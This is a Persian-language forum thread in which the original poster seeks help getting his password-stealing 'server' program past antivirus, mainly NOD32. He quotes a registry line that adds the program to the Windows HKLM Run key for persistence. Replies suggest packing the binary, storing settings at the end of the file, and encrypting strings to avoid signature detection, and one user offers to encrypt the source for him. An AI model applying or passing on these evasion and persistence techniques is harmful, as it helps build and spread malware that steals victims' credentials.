سلام دوستان ! من به اين نتيجه رسيدم كه برنامه رو از درون سورس آنتي رو دور بزنم و تا الان موفق شدم چند آنتي رو دور بزنم و در حال حاضر فقط ناد 32 سرور برنامه من رو ميگيره و دقيقا ميدونم كه به كجاش گير ميده , حالا از دوستان ميخوام كه چيكار كنم سرور من رو رجيستري قرار بگيره بدون اين كه آنتي بگيرتش اينم كدش كه آنتي گير ميده.
'SetRegistry HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyName, FindSysFolder & "\" & S
دوستان لطفا جواب من رو بديد چون خيلي لازمش دارم !
خيلي ممنون !
سلام
دوست عزیز
ویروستو با پکر mbox پکش کن الان مغازه هستم.
نمیتونم زیاد توضیح بدم اما میتونی باهاش نود 32 را دور بزنی
پكر خوب نيست , چون نميشه سرور رو بعد اديت كرد !
واسه چی میخوای ادیتش کنی ؟
تا بفهمم میخوای چکار کنی و توضیح بیشتری بدم
ممنون ! اديت سرور كه نياز هست واسه هر پسورد سندري , مثل قرار دادن ايميل , پيغام تغلبي , تغيير آيكن و....بايد اديت سرور باشه , اگه من اين سرور رو پك كنم ديگه كاربر نميتونه تنظيمات جديد رو وارد كنه , مشكل من فقط ناد32 هست , اونم فهميدم از كجاش هست كه در پست بالا نوشتم...نميشه كاريش كرد؟
اطلاعات رو اخر فایل بنویس و از اخر فایل بخون اینجوری اگه پک شده هم باشه تاثیری نداره
ممنون , اما پكر زياد چيز خوبي نيست , من الان برنامه خودم رو پك كنم آخرش ناد32 نميشناسه در عوض چند تا آنتي ديگه ميگيرتش , و ديگه فايده نداره , راهي نيست كه آنتي به كد كپي سرور در رجيستري گير نده؟ هر كسي ميدونه راهنمايي كنه خيلي ممنون !
کد:
SetRegistry HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyName, FindSysFolder & "\" & S
شما String ها رو تو برنامت encryptکن انتی ها نمیشناسن
(از xor با 256 و این چیزها استفاده نکن که باز هم همین اشو همین کاسه هست یه چیز درست حسابی بنویس)
يكي از دوستان هم گفتند كه بايد برنامه رو كد كني ! منظورش رو خوب نفهميدم , مقاله اي در اين رابطه هست؟ مرسي
سلام
سورستو بده یا بفرست واست رمز نگاریش میکنم :-دی
تمام سورستو کاری نداره که !!!